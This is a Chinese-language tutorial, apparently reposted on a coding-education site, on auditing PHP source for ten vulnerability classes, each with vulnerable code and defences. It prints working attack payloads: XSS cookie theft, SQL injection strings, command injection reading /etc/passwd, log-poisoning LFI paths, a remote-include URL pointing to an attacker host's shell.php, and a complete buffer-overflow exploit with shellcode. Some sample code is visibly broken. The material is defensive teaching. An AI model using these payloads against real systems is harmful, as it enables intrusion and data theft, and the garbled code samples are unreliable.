编程学习网 > PHP技术 > 编程学习网站:十种php源码快速审计方式一键get
2021
06-05

编程学习网站:十种php源码快速审计方式一键get

在开始PHP代码分析之前,必须先完成以下两项工作:



  • 安装php程序;
  • 使用支持PHP代码高亮的编辑器(比如Emeditor - Notepad++)。


在下文中所提供的方法仅作为简单的攻击和防御参考。本文旨在介绍攻击和防御方法。



注意1:其中一些话题归Wikipedia版权所有

注意2:必须在PHP源码中寻找以下变量:



$_SERVER

$_GET

$_POST

$_COOKIE

$_REQUEST

$_FILES

$_ENV

$_HTTP_COOKIE_VARS

$_HTTP_ENV_VARS

$_HTTP_GET_VARS

$_HTTP_POST_FILES

$_HTTP_POST_VARS

$_HTTP_SERVER_VARS




以上变量均为PHP中的可输入变量。


注意3:关于这些变量的更多信息可访问PHP官方网站:


www.php.net



1- Cross Site Scripting (XSS) / CRLF [Medium]


跨站脚本(XSS)属于WEB程序中的一类计算机安全漏洞,它允许在用户浏览的网页中注入恶意代码,比如HTML代码和客户端脚本。可利用的跨站脚本漏洞可被攻击者用于绕过访问控制,比如同源策略(same origin policy)。这类漏洞可被用于构造钓鱼攻击和浏览器攻击。




攻击:


攻击者在其请求中注入HTML代码。


Exp1:




<?php


$error_message= $_GET['error'];


print$error_message ;


?>


index.php?error=<script>alert(document.cookie)</script>




Exp 2:




<html>

<body>

<inputname="show_courses" value="<?php echo $_GET['show_courses']; ?>" >

</body>

</html>

#http://127.0.0.1:81/1.php?show_courses="><script>alert(document.cookie);</script>




防御:




<?php

$error_message= $_GET['error'];

printhtmlspecialchars($error_message );

?>




2- SQL Injection [medium]


SQL注入是利用WEB程序数据层的安全漏洞进行代码注入的技术。当用户输入的数据中并未对嵌入的SQL声明语句进行正确过滤时,或者用户并没有被严格地限制输入,从而导致恶意代码被执行,就有可能造成SQL注入漏洞。这是一类很普遍的安全漏洞,它可在任何时候发生于被嵌入的编程或脚本语言之中。




攻击:


SQL注入是PHP代码审计过程中发现的最为严重的漏洞之一,关于这类攻击更多的信息可以通过阅读下面提供的参考资料获得,而这里只是简述此类漏洞而已。




Example 1:




<?php

$id= $_GET['id'];

$query= "SELECT *FROM users WHERE id= ' “ .$id." ;"

...

?>

index.php?id=1+UNION+SELECT+1,@@version,3,4,5+from+users/*




Example 2:




#login.php:

<?

//login.php -- SQL InjectionVulnerable page

//Attack and defence php appsbook

//shahriyar - j

$user = $_POST['user'];

$pass = $_POST['pass'];

$link = mysql_connect('localhost', 'root', 'pass') or die('Error: '.mysql_e

rror());

mysql_select_db("sql_inj", $link);

$query = mysql_query("SELECT *FROM sql_inj WHERE user ='".$user."' AND pas

s ='" .$pass. "'",$link);

if (mysql_num_rows($query) == 0) {

echo"<scripttype=\"text/javascript\">window.location.href='index.html';</sc

ript>";

exit;

}

$logged = 1;

?>



当用户(可能为攻击者)发送$_POST['user'] , $_POST['pass']给 login.php时,这些变量直接存储在SQL请求命令中。如果攻击者发送:




$user = 1' OR '1' = '1

$pass = 1' OR '1' = '1


将会绕过login.php的登陆验证,读者当注意此类代码。




防御:


下面是通用的防注入代码<最好还是采用白名单的过滤方式>:




<?php

$title= $_POST['title']; // user inputfrom site

$description= $_POST['description']; // user input from site

//define the cleaner

$dirtystuff= array("\"", "\\", "/", "*", "'", "=", "-

", "#", ";", "<", ">", "+", "%");

//clean user input (if it finds any of the values above, it will replace it with

whateveris in the quotes - in this example, it replaces the value with nothing)

$title= str_replace($dirtystuff, "", $title); // works!

$description= str_replace($dirtystuff, "", $description); // works!

//input: I\ "like/ green< ** veg'et=a-bles> ;and< pizza**

//output: I like green vegetables and pizza

//input: a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%

//output: aDROP TABLE users SELECT FROM data WHERE name LIKE

?>




更多信息 :



http://www.php.net/manual/en/security.database.sql-injection.php





2- HTTP Response Splitting [Medium]


HTTP响应分裂是一种WEB程序漏洞,它可以导致应用程序或者环境设置对输入值的过滤失效,也可以执行跨站脚本攻击,跨用户攻击,WEB缓存中毒以及其它类似的攻击。




重要的HTTP头列表:




在PHP语言中,我们可以使用”header”函数来设置HTTP头,在一些PHP源码中,你可以发现"header", "$_SERVER"等函数。在"$_SERVER"函数中的一些参数包含有用户输入的数据:



REQUEST_URI, PATH_INFO, QUERY_STRING

Example 1:


<?php

redirect_page = $_GET['page'];

header ("Location:" . redirect_page);

?>

redirect.php?page=http://www.abysssec.com

For $_SERVER:

<?php

echo "Welcome From " . $_SERVER['HTTP_REFERER'];

?>




可以使用Mozilla Firefox插件"Tamper Data"来发送通常的HTTP header:


https://addons.mozilla.org/en-US/firefox/addon/966


Example 2 :




<?php

$Name = "test"; //senders name

$email = "email@adress.com"; //senders e-mailadress

$recipient = $_GET['to'];//recipient

$mail_body = "The textfor the mail..."; //mail body

$subject = "Subject…"; //subject

$header = "From:". $Name . " <". $email . ">\r\n";

mail($recipient, $subject, $mail_body, $header); //mail command :)

?>



CRLF是HTTP Response Splitting的另一种方式。在上面的例子中,行4中的$recipient变量并没有对所有的输入数据进行检测,以致攻击者可以添加“CC”:


默认输入为:




$headers = "From:myplace@here.com\r\n";

$headers .= "CC:sombodyelse@noplace.com\r\n";




“CC” 和 ”From” 被 ”\r\n” 分隔。




污染输入:



Mail.php?to=info@test.com\r\nCC: sombodyelse@noplace.com




防御:


1- 检测Mail Header的输入值


2- 可使用以下方式输入,而不用URL输入:




<?php

$id = $_GET['url_id'];

if ($id == 1) {

header ("Location:" . redirect_page);

}

?>


和:




<?php

echo "Welcome From " . htmlspecialchars($_SERVER['HTTP_REFERER']);

?>




攻击实例:



http://www.securiteam.com/unixfocus/6F00Q0K6AK.html

http://o0o.nu/~meder/o0o_Blogger_HTTP_response_splitting.txt

http://www.securityfocus.com/archive/1/369405


4- 动态赋值漏洞 [High]:


1-当使用动态函数加载时,可通过请求来执行指定的函数,导致攻击者可以执行任意函数。


攻击:




<?php

$myfunc = $_GET['myfunc'];

$myfunc();

?>

Index.php?myfunc=phpinfo




2-全局函数漏洞


Register Global是危险的“PHP扩展”:


当其打开时,register_globals可利用各种变量注入脚本代码,比如来自HTML表单的请求。这种漏洞主要与PHP变量未初始化相关,以致轻而易举地即可向其写入恶意代码。这是一个艰难地抉择,但PHP官方最后依然决定在默认情况下禁止该指令。当允许该指令时,用户仍可使用变量,但无法确定它是来自哪里,而只能靠猜测。在脚本中定义的内部变量很容易与用户发送的请求数据相混淆,而只能通过禁止register_globals来解决这种情况。下面演示一个未使用register_globals的例子:


Admin.php




<?php

if (isset($is_admin)) {

//Yes, I'm the admin so callthe Administration Pannel

[...]

} else {

//No, I'm not the admin

[...]

}

?>

# admin.php?is_admin=1




另一个说明register_globals存在问题的例子就是下面关于动态路径的包含:




<?php

include "$path/script.php";

?>


当允许register_globals时,可用以下方式请求页面:


Index.php?path=http://evil.example.org/?


相当于下面的请求:




<?php

include 'http://evil.example.org/?/script.php';

?>


注意(php.ini配置):


如果allow_url_fopen是enabled(默认情况下是enabled,甚至在php.ini中民被推荐的设置),这将包含http://evil.example.org/的输出,正如本地文件一般。这是一个严重的安全漏洞,这也是在一些开源的代码程序中被发现的。


防御:


不要使用这种方式去加载函数,这是一个危险地带!任何时候,任何情况下,Register Global都应该关闭!或者将变量的内容设置如下:




<?php

$is_admin =();

if (isset($is_admin)) {

//Yes, I'm the admin so callthe Administration Pannel

[...]

} else {

//No, I'm not the admin

[...]

}

?>







5- 进程控制/PHP代码注入 (HIGH):


当我们使用下列函数:“PHP进程执行函数&进程控制”,并且用户可以输入变量(见上面),那么将导致任意的PHP代码被执行。


PHP进程控制列表:




Exec

system

passthru

shell_exec

proc_open

pcntl_exec

Example 1:

<?php

$page = $_GET['page'];

system ("type ". $page);

?>

# index.php?page=/etc/passwd |uname –a




Example 2:


下列代码是来自一项管理系统的WEB程序,它允许用户封装批处理文件进行Oracle数据库备份,然后运行cleanup.bat脚本去清除一些临时文件。rmanDB.bat可接受单命令行参数,由它指定备份类型。因为数据库访问是受限的,备份程序需要权限用户才可执行。




<?

...

$btype = $_GET['backuptype'];

$cmd = "cmd.exe /K\"c:\\util\\rmanDB.bat " . $btype . "&&c:\\utl\\cleanup.

bat\"";

system(cmd);

...

?>


这个问题主要是读取用户数据的backuptype参数时未对其进行任何有效地过滤所导致的。特别是Runtime.exec()函数将不能执行多条命令,但在这种情况下,程序为了单次调用Runtime.exec()以执行多条命令,它就得先去执行cmd.exe shell。Shell一经调用,它将会分别执行被点号分隔的多条命令。如果攻击者发送一条经恶意构造的命令"&& del c:\\dbms\\*.*",那么程序将随之执行该条命令。由于程序需要一定的权限才能与数据库交互,因此被注入的任何命令都将以此权限运行。


当程序员使用eval()函数操作内部数据时,这些数据都可能会被攻击者关注到,因为它很容易导致代码执行漏洞的发生:




<?php

$install = $_REQUEST['install_command'];

eval($install);

?>




上面的代码如玫瑰香一般诱人,因为它可能被用来执行代码注入。



install.php?install_command=phpinfo();




实例代码:




<?php

[...]

$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {

if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {

eval("\$$register_poll_vars[$i] =

\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");

} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {

eval("\$$register_poll_vars[$i] =

\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");

} else {

eval("\$$register_poll_vars[$i] = '';");

}}

[...]

?>




$$register_poll_vars[$i] 是用户输入的变量。





http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//




6- 本地/远程文件包含(High):


本地或者远程文件包含是PHP代码审计中的高危漏洞,攻击者可利用它加载本地或者远程文件到PHP WEB页面。


危险函数:




include

include_once

require

require_once

show_source

highlight_file

readfile

file_get_contents

fopen

file


通常,PHP中的每一个“文件系统函数”都可能是危险的,可参见这里:


http://ir.php.net/manual/en/ref.filesystem.php



本地文件包含:




<?php

include('../geshi.php');

if ( isset($_POST['submit']) ) //*

{

//*

if ( get_magic_quotes_gpc() ) $_POST['source'] =

stripslashes($_POST['source']);

if ( !strlen(trim($_POST['source'])) )

{

//BUG is HERE

$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] .

'.php'));

$_POST['language'] = 'php';

}

?>




在星号*标记的一行中,如果存在变量$_POST ['submit']和 $_POST ['language'],那么你就可以读取任何的PHP文件。因此,我们可以利用此漏洞读取config.php文件!


Exploit:




<formaction="http://[HOST]/example.php" method="post">

Path to file:

example: ../../../../config

<textareaname="language"></textarea>

<input type="submit"name="submit" value="See">

</form>




注意:


在本地文件包含(LFI)攻击中,攻击者可读取对方主机中的任何日志文件和本地文件。也许这种文件浏览并不能造成多大危害,但攻击者可先构造一个错误,然后该错误会被记录在服务器上的日志文件中(apache log / error log等等)。当攻击者向目标主机请求一个未存在的文件时:


Test000.php?code=<?php;phpinfo();?>


这将会把全路径地址都记录在error.log文件中(在本例中,你的日志文件路径可能与笔者不同),与此同时,当我们利用LFI漏洞的变量去加载error.log时,攻击者即可执行自己的PHP代码。


默认日志文件路径列表:




var/log/httpd/access_log

var/log/httpd/error_log

apache/logs/error.log

apache/logs/access.log

apache/logs/error.log

apache/logs/access.log

apache/logs/error.log

apache/logs/access.log

apache/logs/error.log

apache/logs/access.log

apache/logs/error.log

apache/logs/access.log

logs/error.log

logs/access.log

logs/error.log

logs/access.log

logs/error.log

logs/access.log

logs/error.log

logs/access.log

logs/error.log

logs/access.log

etc/httpd/logs/access_log

etc/httpd/logs/access.log

etc/httpd/logs/error_log

etc/httpd/logs/error.log

var/www/logs/access_log

var/www/logs/access.log

usr/local/apache/logs/access_log

usr/local/apache/logs/access.log

var/log/apache/access_log

var/log/apache/access.log

var/log/access_log

var/www/logs/error_log

var/www/logs/error.log

usr/local/apache/logs/error_log

usr/local/apache/logs/error.log

var/log/apache/error_log

var/log/apache/error.log

var/log/access_log

var/log/error_log




远程文件包含:


远程文件包含攻击允许恶意用户在存在漏洞的主机上运行自己的PHP代码,攻击者可包含存放在网上空间中用PHP编写的网页(恶意)代码。例如下面的一段漏洞代码:




<?php

if (eregi("theme.php", $_SERVER['PHP_SELF']))

die();

global $theme, $_FNROOTPATH,$lang; //<-- REQUEST Variable

global $forumback, $forumborder;

$_FN['table_background']=&$forumback;

$_FN['table_border']=&$forumborder;

if ($forumback==""&& $forumborder==""){

$forumback="ffffff";

$forumborder="000000";

} // Load File

require_once ($_FNROOTPATH . "themes/$theme/theme.php");

...

?>




Exploit:


由于变量$_FNROOTPATH未明确地指定数值,因此攻击者可以注入本地的恶意文件到URL中,并在目标服务器上执行:



http://localhost/~flatnux/index.php?_FNROOTPATH=http://attacker.com/shell.php%00



7 –文件管理 (HIGH):


有些PHP函数可用于文件管理,如果偷懒的程序员没有对输入变量进行很好地检测,那么就可能造成这种高危漏洞。


Copy函数:




<?php

$file = $_GET['cpFile'];

$newfile = "/user/local/www/html/tmp/file.php";

if (!copy($file, $newfile)) {

echo "failed to copy $file...\n";

} else {

echo " thanks .."

}

?>




攻击者可以复制其它文件,比如'/etc/passwd'into '$newfile',然后读取它。



http://victim.com/index.php?cpfile=/etc/passwd




其它危险函数如下:


文件删除 [见PHP.Net]:




Rmdir

unlink

delete

fwrite




压缩 & 解压缩函数:




<?php

$file = "/tmp/foo.bz2";

$bz = bzopen($file, "r") or die("Couldn't open $file for reading");

bzclose($bz);

?>




8- 缓冲区溢出 (High, 但难利用):


当程序员使用下面的危险函数时:




confirm_phpdoc_compiled

mssql_pconnect

mssql_connect

crack_opendict

snmpget

ibase_connect




缓冲区溢出漏洞就可能发生在上面的函数中。




缓冲区溢出举例(snmpget()):




<?php

$host = $_GET['host'];

$timeout = $_GET['timeout'];

$syscontact = snmpget("$host", "public", "$timeout");

?>






Exploit:




<?php

// PHP 4.4.6 snmpget() objectid local buffer overflow poc exploit

// rgod [-> R.I.P] +Edited By Abysssec INC

// site:http://retrogod.altervista.org

// win xp sp2 version

if (!extension_loaded("snmp")){

die("you need the snmp extension loaded.");

}

$____scode=

"\xeb\x1b".

"\x5b".

"\x31\xc0".

"\x50".

"\x31\xc0".

"\x88\x43\x59".

"\x53".

"\xbb\x6d\x13\x86\x7c". //WinExec

"\xff\xd3".

"\x31\xc0".

"\x50".

"\xbb\xda\xcd\x81\x7c". //ExitProcess

"\xff\xd3".

"\xe8\xe0\xff\xff\xff".

"\x63\x6d\x64".

"\x2e".

"\x65".

"\x78\x65".

"\x20\x2f".

"\x63\x20".

"start notepad &";

$edx="\x64\x8f\x9b\x01"; //jmp scode

$eip="\x73\xdc\x82\x7c"; //0x7C82DC73 jmpedx

$____suntzu=str_repeat("A",188).$edx.str_repeat("A",64).$eip.str_repeat("\x

90",48).$____scode.str_repeat("\x90",48);

//more than 256 chars resultin simple eip overwrite

$curl = curl_init();

//Send Time out

curl_setopt ($curl, CURLOPT_URL, "http://target.com/snmp.php?host=127.0.

0.1&timeout=$____suntzu");

curl_exec ($curl);

curl_close ($curl);

?>




9- Cookie / Session injection / Fixation / [High]:


会话安全是一个高端话题,成为被频繁攻击的目标也就不足为奇了。主要的session攻击包括会话冒充,攻击者可以访问到由其它用户发起的会话。对于攻击者而言,最为重要的信息莫过于会话ID(sessionidentifier),因为这是完成会话冒充攻击必备的条件。下面有三种方法可以获得一个有效的会话ID:


●预测法


●捕获法


●注视法


预测法可用于猜测有效的会话ID。由于PHP本有的会话机制,会话ID都是非常随机化的,因此这里并不是执行攻击的最薄弱点。


捕获有效的会话ID是最为普遍的会话攻击类型,当然,这还有很多其它方法。由于会话ID是在cookies或者GET变量中传输的,因此各种攻击方式都主要聚焦于这些传输方式。当浏览器存在一些关于cookies的漏洞时(大部分是发生在Internet Explorer中),cookies比GET变量曝露会话ID的机率更低,因此对于大多数使用cookies的用户,你可以为他们提供一种更为安全的传输机制——利用cookie传输会话ID。


      注视法是获取有效会话ID最为简单的方式。这种方法很难被防御,但如果你的会话机制仅仅使用session_start(),那么就可能存在漏洞。为了演示这种会话注视法,请看下面的代码,session.php:






<?php

session_start();

if (!isset($_SESSION['visits']))

{

$_SESSION['visits'] = 1;

}

else

{

$_SESSION['visits']++;

}

echo $_SESSION['visits'];

?>




当首次访问该页面时,你可以看到1被输出到屏幕上。在随后的每次访问中,该数值将会随之增加,以反映页面访问次数。


为了演示session fixation,首先需要确保你的电脑上并不存在会话ID(可以删除cookies),然后将?PHPSESSID=1234添加到URL中以访问该页面。接着,以完全不同的浏览器(甚至是完全不同的计算机)访问添加了?PHPSESSID=1234的URL地址。此时你将会看到屏幕上并没有输出1,而是继续你之前开始的会话。


为何存在这种问题呢?大部分的session fixation攻击只是简单地使用一个链接或者一个协议,以将用户重定向到一个包含会话ID的URL地址的远程站点。用户可能并不会注意到,因为这个站点将显示完全相同的内容。由于会话ID已被获知了,那么就可以利用它来发动伪造攻击,比如会话劫持(session hijacking)。


      一次像这样简单的攻击是很容易被阻止的。如果正在活动的会话与用户拥有的会话ID无关,那么它可以重新生成会话ID:




<?php

session_start();

if (!isset($_SESSION['initiated']))

{

session_regenerate_id();

$_SESSION['initiated'] = true;

}

?>




对于这样简单的防御,攻击者只需用一个特定的会话ID初始化session即可,然后使用该ID发动攻击。为了阻止这类攻击,首先应当知道会话劫特只在用户登陆后有效,或者要不然就是获得高权限后才有用。因此,如果当权限级别改变时(例如核实用户名和密码后),我们就应该修改即将重新生成的会话ID,这样我们才能真正地消除被sessionfixation攻击的风险。




会话劫持(Session Hijacking)


在所有被用来访问他人会话的攻击技术中,会话劫持无疑是最普遍的一种会话攻击技术。正如session fixation一样,如果你的会话机制仅由session_start()组成,那么它就存在漏洞,即使利用起来并不简单。与其关注如何阻止会话ID被窃取,倒不如想想如何成功地完成一次会话ID窃取。由于会话伪造的每一步复杂化都会提高我们的安全性,因此为了将会话劫持复杂化,我们需要检查成功完成会话劫持所需要的每一步骤。在每一种方案中,我们都将假设会话ID已被窃取。在最为简单的会话机制中,一个有效的会话ID是会话劫持成功与否的关键所在。为了完善它,我们需要查看用于其它认证的HTTP请求中是否还有其它东西。




注意


单纯地依靠TCP/IP层上的东西(比如IP地址)是不明智的,因为一些更为底层的协议无法兼容发生在HTTP层上的行为。一个用户可能用不同的IP地址去完成每一次的请求,多个用户也可能拥有共同的IP地址。




一个典型的HTTPrequtest:




GET / HTTP/1.1

Host: example.org

User-Agent: Mozilla/5.0Gecko

Accept: text/xml,image/png, image/jpeg, image/gif, */*

Cookie: PHPSESSID=1234






由于Host header是HTTP/1.1所必需的,因此依靠其它信息是不明智的。但是,防御的坚固程度确实是我们所需要的,因为我们关注的是如何增加会话伪造的难度,以防止危害到合法用户。假设之前的request是由下面与之不同的User-Agent请求的:






GET / HTTP/1.1

Host: example.org

User-Agent: MozillaCompatible (MSIE)

Accept: text/xml,image/png, image/jpeg, image/gif, */*

Cookie: PHPSESSID=1234






虽然相同的cookie是存在的,但是是否可以假设它们是同一用户呢?这似乎与浏览器更改请求包中的User-Agentheader很不同吧?下面我们修改会话机制以进行对比:






<?php

session_start();

if (isset($_SESSION['HTTP_USER_AGENT']))

{

if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))

{

/* Prompt for password */

exit;

}

}

else

{

$_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);

}

?>






现在攻击者不仅需要提供一个有效的会话ID,而且还必须提供与会话中相匹配的User-Agent header。虽然这使事情轻微的复杂化,但这可以使它变得更为安全了。


我们是否还可以再提高它的安全性呢?人们认为获取cookie值的通用方式就是利用浏览器(比如IE)漏洞。这些攻击方式包括受害者访问攻击者的恶意站点,因此攻击者也可以获取正确的User-Agent header。这就要求我们必须采取其它的保护方式以对抗这种情况。如果我们要求用户在每一项请求中都必须传输User-Agent的MD5值,那么攻击者将无法篡改受害者的请求包中所包含的头信息了,但这也将需要再发送一项附加信息了。当这一特定的token容易被猜测到时,我们可以将这一猜想工作复杂化,以提高猜想的难度,这只需简单地添加一个随机生成的额外数据即可构造出token:




<?php

$string = $_SERVER['HTTP_USER_AGENT'];

$string .= 'SHIFLETT';

/* Add any other data that isconsistent */

$fingerprint = md5($string);

?>




记住,我们是在cookie中传输会话ID的,这就导致了攻击者常常得去破坏cookie(可能所有的HTTP头也是如此)才能窃取到会话ID,因此我们应该以URL变量来传输fingerprint。这些都必须在所有的URL中传输,即使是会话ID也是如此,因为这些都是必需的,这样会话才能自动地保持下去(还得通过所有检测)。


为了确保合法用户不会像犯人一样被对待,这就需要在检测失败时要求输入密码。如果在你的检测方法中存在错误,比如错误地判断一个发动伪造攻击的用户,那么在继续操作前就得要求输入密码,以确保在这种情况下受到最小的攻击。事实上,用户可能在察觉到这种请求方式后,会感激你添加了这种保护方式。


其实还有其它各种不同的方法可以用来提高伪造会话的复杂程度,以防止发生会话劫持。同时希望在对session_start()的额外处理上,你可以有自己的想法。总之只需记住:为难坏小子,方便好小子。







10 – 拒绝服务[Medium, But Hard Assessment]:


WEB程序特别容易受到拒绝服务攻击。一个WEB程序很难讲清恶意数据传输与普通数据传输之间的不同,这里面有多方面的因素,但是其中最为重要的一点就是:由于多种原因,IP地址不能作为可行的鉴定证书。由于没有一种可靠的方式可以得知HTTP request来自哪里,这就导致很难过滤掉一些恶意的数据传输。对于分布式攻击,程序又该如何去辨别真实攻击与多用户同时重载数据(网站的这种临时问题是可能发生的)或者获取“slash dotted”之间的不同呢?


例如:




<?php

//....

$user_mode=$_SERVER['HTTP_USER_AGENT'];

$user_ip=$_SERVER['SERVER_ADDR'];

$sql = "INSERT INTO tbl_name (..)VALUES($user_mode,$user_ip);";

//Summon Myssql For eachRequest and Write into it.

//..

?>



当一些访问者请求查看目标站点时,他们的信息(例如IP及浏览器信息)将会被记录在MYSQL数据库中。与此同时,当一些用户(或者一些攻击者发动请求)发送请求后,Mysql服务器将对其进行处理。


其它循环函数,比如:[While,for ...]


一旦攻击者可摧毁一些必需的资源,那么他们就可以阻止合法用户使用系统。一些被限制的资源包括带宽,数据库连接,磁盘存储,CPU,内存,线程,或者程序特定资源。

扫码二维码 获取免费视频学习资料

Python编程学习

查 看2022高级编程视频教程免费获取